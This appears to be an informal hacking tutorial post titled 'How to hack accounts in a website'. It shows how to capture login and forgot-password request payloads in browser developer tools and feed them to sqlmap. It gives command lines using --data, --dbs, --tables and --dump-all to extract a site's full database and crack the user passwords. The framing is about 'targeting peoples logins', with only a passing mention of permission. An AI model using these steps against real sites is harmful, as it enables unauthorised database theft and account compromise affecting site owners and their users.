'How to hack accounts in a website' $ okay so firstly I teste | ✪᪥TαყʟσɾGᴀɴɢ᪥✪ ᗣ༎T.ɢᴏᴅシ︎
"How to hack accounts in a website"
$ okay so firstly I tested out this method on a website you can hack "it's legal" it's called 'getboo' so search it up and hack it
$ "let hack then , every user and their password is ours"
>Now go to the sites login where it asks for username and password " were gonna target 'asd' "
On username input :: asd On password input :: asd (This above is incorrect)
Go to top right corner of your computer and tap there so the drop down appears...then tap "web developer" then after that tap "network"
Then tap login with those credentials I gave you "asd" then you'll see "login.php" tap that
On the left tap on response it'll say user does not exist (like I said) but woah now we can see what happens in secret when you're logging in you can also see code these are all entry points for us as hackers
Now let's go deeper in the hack
> go to your terminal aka(termux, kali linux etc) > and install sqlmap if you haven't you don't have it install it you can find it easy via Google search
> were gonna use splmap to DUMP out all the "usernames and passwords" of the website
>in your terminal type in "sqlmap" (click to copy)
> then type in "sqlmap -h" (click to copy) to see options were given
> Now type in "sqlmap -u "(input link of website login.php)"
*if you're idiot let me make it simple input there not just the link of website but a attack point like "Google.com/login.php" not just a regular link were targeting peoples logins so make sure you have link of login page*
> type in:: sqlmap -u "(input link of website login.php) --data *(put request payload you found on requests on web developer)it should be a token*
(The --data is to specify the data we received from request payload and set it to be attacked... I'll type again because some of yall have 1 iQ from web developer on requests copy the request payload that starts with 'token=' read this again if you have no brain you'll understand... copy that token after --data in your terminal
> then run the command I just gave you sqlmap will tell you the token you inserted has a anti-CRSF token tap "n" and run it
>it'll ask you somethin else I won't explain it this is an essay now just click "y" and run and click "y" again and run
The site is not injectable okay SIKE GOTCHA BISH
> click "forgot password on website" > input on username "asd" on email input "asd" and run that simple > and since you have web developer open go to requests and copy the payload request again
Run this > sqlmap -u "link of forgot password of that website" --data *request payload you just copied* (click to copy)
> then you'll be asked a question on sqlmap click "Y"
>THATS IT WERE IN
Now let's get those usernames and passwords
Type this in terminal >sqlmap -u *link of forgot password of that website* --data *request payload you just copied* --dbs(click to copy)
(The --dbs is meant to DUMP out all the data)
Now run that command above and you'll be asked a yes or no tap "y" now next you'll see a list since I targeted getboo I'll see it in the database so if you're targeting another site THAT YOU HAVE PERMISSION TO HACK Put in that
Now type this in terminal:; >sqlmap -u "link of forgot password of that website" --data *request payload you just copied* -D getboo --tables (click to copy)
(I put getboo there since it was on the database plus it's what I hacked/targetted and the --tables is to see all tables of data in the website)
Now run the command
>sqlmap -u "link of forgot password of that website" --data *request payload you just copied* -D getboo --dump-all (click to copy)
" the new thing I just added --dump-all is simple it all DUMP everything inside the database including passwords...everything bro"
Now it'll ask questions first one Click "y"
Second one click "n"
Third one will ask if you wanna crack click "y" and click enter on that
If it asks for password suffixes click "n"
THEN ITLL START CRACKING THE PASSWORD FUSE
After click "y" boom all the usernames and passwords there
